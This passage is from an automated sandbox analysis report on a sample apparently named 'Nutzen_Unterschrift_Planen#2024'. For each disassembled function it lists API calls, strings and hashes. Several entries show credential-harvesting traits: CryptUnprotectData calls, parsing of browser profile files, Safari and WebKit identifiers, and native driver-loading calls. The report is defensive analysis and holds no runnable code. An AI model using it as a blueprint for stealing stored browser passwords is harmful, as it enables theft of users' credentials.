                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                            • String ID:
                                                            • API String ID: 2633007058-0
                                                            • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                            • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                            • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                            • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                            Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@memcpymemset
                                                            • String ID:
                                                            • API String ID: 1865533344-0
                                                            • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                            • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                            • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                            • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                            Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: NtdllProc_Window
                                                            • String ID:
                                                            • API String ID: 4255912815-0
                                                            • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                            • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                            • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                            • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                            Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcsicmp.MSVCRT ref: 004022A6
                                                            • _wcsicmp.MSVCRT ref: 004022D7
                                                            • _wcsicmp.MSVCRT ref: 00402305
                                                            • _wcsicmp.MSVCRT ref: 00402333
                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                            • memset.MSVCRT ref: 0040265F
                                                            • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                            • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                            • API String ID: 2929817778-1134094380
                                                            • Opcode ID: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                            • Opcode Fuzzy Hash: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                            Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                            • String ID: :stringdata$ftp://$http://$https://
                                                            • API String ID: 2787044678-1921111777
                                                            • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                            • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                            • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                            • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                            Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                            • GetDC.USER32 ref: 004140E3
                                                            • wcslen.MSVCRT ref: 00414123
                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                                            • _snwprintf.MSVCRT ref: 00414244
                                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                            • String ID: %s:$EDIT$STATIC
                                                            • API String ID: 2080319088-3046471546
                                                            • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                            • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                            Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EndDialog.USER32(?,?), ref: 00413221
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                            • memset.MSVCRT ref: 00413292
                                                            • memset.MSVCRT ref: 004132B4
                                                            • memset.MSVCRT ref: 004132CD
                                                            • memset.MSVCRT ref: 004132E1
                                                            • memset.MSVCRT ref: 004132FB
                                                            • memset.MSVCRT ref: 00413310
                                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                            • memset.MSVCRT ref: 004133C0
                                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                            • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                            • wcscpy.MSVCRT ref: 0041341F
                                                            • _snwprintf.MSVCRT ref: 0041348E
                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                            • SetFocus.USER32(00000000), ref: 004134B7
                                                            Strings
                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                            • {Unknown}, xrefs: 004132A6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                            • API String ID: 4111938811-1819279800
                                                            • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                            • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                            Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                            • EndDialog.USER32(?,?), ref: 0040135E
                                                            • DeleteObject.GDI32(?), ref: 0040136A
                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                            • ShowWindow.USER32(00000000), ref: 00401398
                                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                            • String ID:
                                                            • API String ID: 829165378-0
                                                            • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                            • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                            Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00404172
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                            • wcscpy.MSVCRT ref: 004041D6
                                                            • wcscpy.MSVCRT ref: 004041E7
                                                            • memset.MSVCRT ref: 00404200
                                                            • memset.MSVCRT ref: 00404215
                                                            • _snwprintf.MSVCRT ref: 0040422F
                                                            • wcscpy.MSVCRT ref: 00404242
                                                            • memset.MSVCRT ref: 0040426E
                                                            • memset.MSVCRT ref: 004042CD
                                                            • memset.MSVCRT ref: 004042E2
                                                            • _snwprintf.MSVCRT ref: 004042FE
                                                            • wcscpy.MSVCRT ref: 00404311
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                            • API String ID: 2454223109-1580313836
                                                            • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                            • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                            • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                            • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                            Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                            • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                            • API String ID: 4054529287-3175352466
                                                            • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                            • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                            • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                            • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                            Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcscat$_snwprintfmemset$wcscpy
                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                            • API String ID: 3143752011-1996832678
                                                            • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                            • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                            • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                            • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                            Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                            • API String ID: 667068680-2887671607
                                                            • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                            • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                            • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                            • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                            Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _snwprintfmemset$wcscpy$wcscat
                                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                            • API String ID: 1607361635-601624466
                                                            • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                            • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                            • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                            • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                            Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _snwprintf$memset$wcscpy
                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                            • API String ID: 2000436516-3842416460
                                                            • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                            • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                            • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                            • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                            Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
